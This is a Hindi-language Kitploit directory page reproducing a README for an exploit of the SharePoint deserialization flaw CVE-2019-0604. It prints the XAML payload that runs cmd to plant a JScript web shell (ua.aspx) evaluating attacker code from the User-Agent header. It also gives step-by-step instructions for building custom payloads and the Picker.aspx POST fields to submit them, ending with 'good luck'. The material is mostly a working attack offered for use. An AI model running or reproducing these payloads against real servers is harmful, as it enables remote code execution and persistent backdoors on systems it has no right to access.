Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-0604 — विस्तार से समझाएं k8gege के SharePoint RCE exploit cve-2019-0604-exp.py के कोड को, अपना खुद का payload बनाएं। | Kitploit
उपकरण/GitHubGitHub/boxhg/cve-2019-0604
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubboxhg/cve-2019-0604

CVE-2019-0604

विस्तार से समझाएं k8gege के SharePoint RCE exploit cve-2019-0604-exp.py के कोड को, अपना खुद का payload बनाएं।

रिपॉजिटरी देखें
3065 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

इमेज पेलोड मेकर

एक, k8gege के cve-2019-0604-exp.py की व्याख्या

k8gege का स्क्रिप्ट https://github.com/k8gege/CVE-2019-0604

सच कहूँ तो k8gege का py स्क्रिप्ट थोड़ा फैंसी है, ढेर सारे हेक्साडेसिमल स्ट्रिंग्स, जिन्हें payload1,2,3 में विभाजित किया गया है, अच्छा और बुरा।

पायथन स्क्रिप्ट द्वारा रिमोट पोस्ट किया गया पेलोड, डिसेरियलाइजेशन के बाद एक XML डेटा बॉडी है।

root@kitploit:~
<ResourceDictionary
xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
xmlns:System="clr-namespace:System;assembly=mscorlib"
xmlns:Diag="clr-namespace:System.Diagnostics;assembly=system">
<ObjectDataProvider x:Key="LaunchCalch" ObjectType="{x:Type Diag:Process}" MethodName="Start">
    <ObjectDataProvider.MethodParameters>
		<System:String>cmd</System:String>
		<System:String>/c echo ^&lt;%@ Page Language="Jscript" %^>^&lt;%var pwd="tom";var uastr=Request.UserAgent;if (uastr.Substring(0, uastr.IndexOf("==="))== pwd) {var code=uastr.Replace(pwd+"===","");eval(code,"unsafe"); };%^> > "%CommonProgramFiles%\\Microsoft Shared\\Web Server Extensions\\15\\TEMPLATE\\LAYOUTS\\ua.aspx" </System:String>
    </ObjectDataProvider.MethodParameters>
</ObjectDataProvider>
</ResourceDictionary>

इमेज पेलोड मेकर

अर्थात्, रिमोट पर echo कमांड निष्पादित करके, सर्वर के SharePoint टेम्पलेट layouts निर्देशिका में एक up.aspx फ़ाइल लिखी गई।

root@kitploit:~
cmd /c echo ^&lt;%@ Page Language="Jscript" %^>^&lt;%var pwd="tom";var uastr=Request.UserAgent;if (uastr.Substring(0, uastr.IndexOf("==="))== pwd) {var code=uastr.Replace(pwd+"===","");eval(code,"unsafe"); };%^> > "%CommonProgramFiles%\\Microsoft Shared\\Web Server Extensions\\15\\TEMPLATE\\LAYOUTS\\ua.aspx" 

एक K8 फीदाओ विशेष UA एक-लाइन ट्रोजन .asxp उत्पन्न हुआ, ठीक है, शेल प्राप्त हो गया।

root@kitploit:~
<%@ Page Language="Jscript" %>
<%
var pwd="tom";
var uastr=Request.UserAgent;
if (uastr.Substring(0, uastr.IndexOf("==="))== pwd) 
{
    var code=uastr.Replace(pwd+"===","");
    eval(code,"unsafe"); 
};
%>

दो, अपना खुद का पेलोड बनाएं

यदि आप रिमोट कमांड निष्पादन के लिए अपना खुद का पेलोड बनाना चाहते हैं, तो कृपया इन चरणों का पालन करें:

  1. https://github.com/boxhg/CVE-2019-0604/releases से संकलित प्रोग्राम डाउनलोड करें, अनज़िप करें और CVE20190604Forms.exe चलाएं।

  2. Cmd टेक्स्टबॉक्स में कमांड दर्ज करें, "Update XML" बटन पर क्लिक करें, जो कमांड को XML में मर्ज कर देगा।

  3. "EncodeEntity" पर क्लिक करें, प्रोग्राम XML स्ट्रिंग को ऑब्जेक्ट में सीरियलाइज़ करता है और पेलोड निष्पादित करता है, सीरियलाइज़्ड स्ट्रिंग "payload" टेक्स्टबॉक्स में दिखाई देती है।

root@kitploit:~
__cp087135009700370047005600d600e2004400160047001600e20035005600270067009600360056003700e2009400e600470056002700e6001600c600e2005400870007001600e60046005600460075002700160......
  1. "__cp...." ये स्ट्रिंग्स ही पेलोड हैं, इन्हें cve-2019-0604-exp.py में कॉपी करें, और मूल k8 के पेलोड को बदलें।

  2. Picker.aspx पर पेलोड सबमिट करते समय, साथ में अन्य पैरामीटर भी आवश्यक हैं, जिन्हें Burp प्रॉक्सी टूल के माध्यम से प्राप्त किया जा सकता है, फिर पेलोड मान को ctl00$PlaceHolderDialogBodySection$ctl05$hiddenSpanData को भेजें।

root@kitploit:~
...

values = {
    '__REQUESTDIGEST':YOUR_REQUESTDIGEST,
    '__EVENTTARGET':'',
    '__EVENTARGUMENT':'',
    '__spPickerHasReturnValue':'',
    '__spPickerReturnValueHolder':'',
    '__VIEWSTATE':YOUR_VIEWSTATE,
    '__VIEWSTATEGENERATOR':'',
    'ctl00$PlaceHolderDialogBodySection$ctl07$queryTextBox':'',
    'ctl00$PlaceHolderDialogBodySection$ctl05$hiddenSpanData':**YOUR_PayloadData**,
    'ctl00$PlaceHolderDialogBodySection$ctl05$OriginalEntities':'<Entities />',
    'ctl00$PlaceHolderDialogBodySection$ctl05$HiddenEntityKey':'',
    'ctl00$PlaceHolderDialogBodySection$ctl05$HiddenEntityDisplayText':'',
    'ctl00$PlaceHolderDialogBodySection$ctl05$downlevelTextBox':'&#160;',
    '__CALLBACKID':'ctl00$PlaceHolderDialogBodySection$ctl07',
    '__CALLBACKPARAM':';#;#11;#;#;#',
    '__EVENTVALIDATION':YOUR_EVENTVALIDATION
}

data = urllib.urlencode(values)

...
  1. py स्क्रिप्ट चलाएं, गुड लक!!!

Burp का उपयोग करके पेलोड भेजने की सिफारिश की जाती है, यह अधिक सुविधाजनक है।

CVE-2019-0604 से संबंधित:

https://www.thezdi.com/blog/2019/3/13/cve-2019-0604-details-of-a-microsoft-sharepoint-rce-vulnerability

https://github.com/linhlhq/CVE-2019-0604

https://github.com/k8gege/K8CScan/wiki/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8-CVE-2019-0604-SharePoint-GetShell-Exploit

https://github.com/k8gege/CVE-2019-0604

टूल डाउनलोड करें